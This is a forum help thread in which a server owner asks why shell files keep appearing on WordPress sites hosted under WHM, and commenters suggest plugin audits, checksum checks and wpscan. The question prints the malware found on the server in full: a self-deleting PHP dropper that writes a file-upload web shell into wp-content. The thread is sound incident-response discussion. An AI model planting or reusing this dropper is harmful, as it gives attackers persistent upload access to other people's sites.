# Shell file attacks

Tags: php, linux, wordpress, security, hosting

*At the first I should notice that I don't know my problem yet and I'm going to find the reason some curreption happens!*

I've a host with whm installed over it, and some websites are defined on it. There's some days that the eXploit Scanner finds some shell files attacking that shows as Fingerprint. That shell file was attacking my wordpress files and I've cleared them by reinstalling all plugins and theme. Also I installed some anti-malware and firewall plugins on my wordpress this time, But still I see some logs.

web script actually runs in somewhere like: */etc/cxs/cxscgi.sh* with a url like *abc.com/wp-admin/admin-post.php*

I don't what should I do to protect my sources and host anymore!

This is the file it puts on the server:

```
<title>Vuln!! patch it Now!</title>
<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$s = '<title>Vuln!! patch it Now!</title><?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Shell Uploaded ! :)<b><br><br>"; }else { echo "<b>Not uploaded ! </b><br><br>"; }}?>';
$check = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/vuln.php";
$text = $s;
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;

$check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ;
$text2 = 'Vuln!! patch it Now!';
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits";
echo "done .\n " ;

@unlink(__FILE__);
?>
```

Comment: Sounds like you know which site has the problem, you should be able to patch that specific site, and/or remove/reset themes and plugins.

Comment: I did Chris! I cleared once via deleting all files and uploaded the fresh download of wordpress and all plugins and theme. The problem still remains!

Comment: I’d personally start by disabling all plugins and change the theme over, and then slowly re-enable to find a culprit. You might also have something stuck in the database, too, but that would usually (or always?) require non-core code to execute.

Comment: I'm talking about scripts, you're talking about plugins disabling! Your solution works when you see a bug in your site! I'm talking about a stage behind of it. Some scripts like what I shared with you are treating servises!

Comment: Yes, my point is that the file is probably coming in through a plugin and/or theme that has a [vulnerability](https://malcure.com/blog/security/vuln-php-recurring-malware-infection-identification-and-clean-up/), but it could also be something stuck in options, or it could be a compromised account. If it is running something from `/etc you probably have a privilege problem. _You_ tagged this WordPress, which is why I’m giving WordPress answers. If you think this is unrelated, you can remove that tag.

Comment: This happens when a bug exists in the library, I mentioned because some times somebody experienced something like that and knows which kinds of plugins may have this bug.

Comment: All code that accepts and/or processes external input is potentially vulnerable to this, including but not limited to WordPress plugins and themes. Asking us to produce a list of plugins that might be vulnerable is outside the scope of this site. You can look up your specific plugin and versions on a [site such as this](https://wpscan.com/plugins). Before looking up plugins, make sure to compare the checksums. Themes also sometimes ship plugins, and some hack them a bit, so make sure to check for those, too.

Comment: you could try to use [wpscan](https://github.com/wpscanteam/wpscan) on your own website